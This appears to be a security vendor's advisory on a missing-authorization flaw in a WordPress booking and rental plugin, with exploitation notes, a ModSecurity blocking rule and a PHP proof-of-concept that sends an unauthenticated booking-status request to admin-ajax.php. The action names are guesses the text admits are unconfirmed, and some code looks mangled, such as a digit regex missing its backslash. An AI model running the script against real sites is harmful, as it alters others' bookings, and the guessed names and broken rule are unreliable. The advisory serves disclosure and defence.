Atomic Edge analysis of CVE-2026-57660 (metadata-based):
This vulnerability affects the Booking and Rental Manager for WooCommerce plugin (slug: booking-and-rental-manager-for-woocommerce) versions up to and including 2.7.1. An unauthenticated attacker can perform unauthorized actions due to a missing capability check on a function. The CVSS score is 5.3 (Medium) with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N, indicating network-based, low-complexity exploitation with no privileges or user interaction required, resulting in low integrity impact but no confidentiality or availability impact.
Root Cause: The vulnerability stems from a Missing Authorization (CWE-862) in one or more plugin functions, likely AJAX handlers registered via WordPress hooks like wp_ajax_{action} and wp_ajax_nopriv_{action}. The description and CWE indicate the plugin failed to include a capability check (e.g., current_user_can() or if ( !current_user_can(‘manage_options’) ) return;) before executing sensitive operations. Since no code diff is available, Atomic Edge analysis infers this is the most common pattern for such vulnerabilities in WordPress plugins, especially those handling rental bookings where actions like approving, editing, or deleting reservations should require administrative or at least authenticated user privileges.
Exploitation: An unauthenticated attacker can send a crafted HTTP request to the WordPress admin AJAX endpoint (admin-ajax.php) with the plugin’s specific action parameter. The exact action name is not disclosed in the CVE metadata, but based on the plugin’s functionality and common naming conventions, it likely follows patterns such as ‘booking_and_rental_manager_approve’, ‘booking_and_rental_manager_delete_booking’, or ‘booking_and_rental_manager_update_status’. The attacker can trigger this request without any authentication or nonce, as the vulnerability is the absence of a capability check. A typical POST request would include action=plugin_specific_action along with necessary parameters like booking_id, status, etc.
Remediation: The patched version (2.7.2) likely adds a capability check to the vulnerable function. The fix should validate that the current user has appropriate permissions (e.g., current_user_can(‘edit_posts’) or a custom capability) before executing the action. Plugin developers should also implement nonce verification (check_admin_referer()) as a secondary defense layer. For administrators unable to update immediately, they may restrict access to the AJAX handler via server-level rules or temporarily disable the vulnerable functionality.
Impact: Exploitation allows unauthenticated attackers to perform actions that should require authorization, such as modifying booking statuses, deleting reservations, or accessing privileged data flows. The CVSS integrity impact is low, suggesting the attacker cannot fully overwrite the system but can alter specific records. This could lead to booking manipulation, denial of legitimate service, or data corruption. No privilege escalation is possible, but the lack of authentication broadens the attack surface significantly, enabling any internet user to interact with plugin internals.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-57660 (metadata-based)
# Blocks unauthenticated AJAX requests to known vulnerable actions of the Booking and Rental Manager plugin
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:202657660,phase:2,deny,status:403,chain,msg:'CVE-2026-57660 - Attempted exploitation via Booking and Rental Manager AJAX action',severity:'CRITICAL',tag:'CVE-2026-57660'"
SecRule ARGS_POST:action "@pm booking_and_rental_manager_approve booking_and_rental_manager_cancel booking_and_rental_manager_delete_booking booking_and_rental_manager_update_status" "chain"
SecRule ARGS_POST:booking_id "@rx ^d+$" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-57660 - Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment <= 2.7.1 - Missing Authorization
/**
* This PoC demonstrates exploitation of a missing authorization vulnerability in the
* Booking and Rental Manager for WooCommerce plugin (version <= 2.7.1).
* It targets the AJAX handler that lacks a capability check, allowing unauthenticated
* attackers to perform actions such as modifying booking statuses.
*
* Note: The exact AJAX action name is not confirmed from code. We assume common patterns
* based on the plugin's functionality (approve_booking, cancel_booking, update_status).
* This script uses a generic action placeholder; modify $action and $params as needed.
*/
// Configuration
$target_url = 'http://example.com'; // Change to target WordPress site URL
$action = 'booking_and_rental_manager_approve'; // Likely AJAX action - adjust based on plugin
$params = array(
'booking_id' => 1,
'status' => 'approved'
);
// Construct the AJAX endpoint
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';
// Build POST data
$post_data = array_merge(array('action' => $action), $params);
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing; remove in production
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
// Output results
echo "Target: $ajax_urln";
echo "Action: $actionn";
echo "HTTP Code: $http_coden";
if ($error) {
echo "cURL Error: $errorn";
} else {
echo "Response:n$responsen";
}
?>
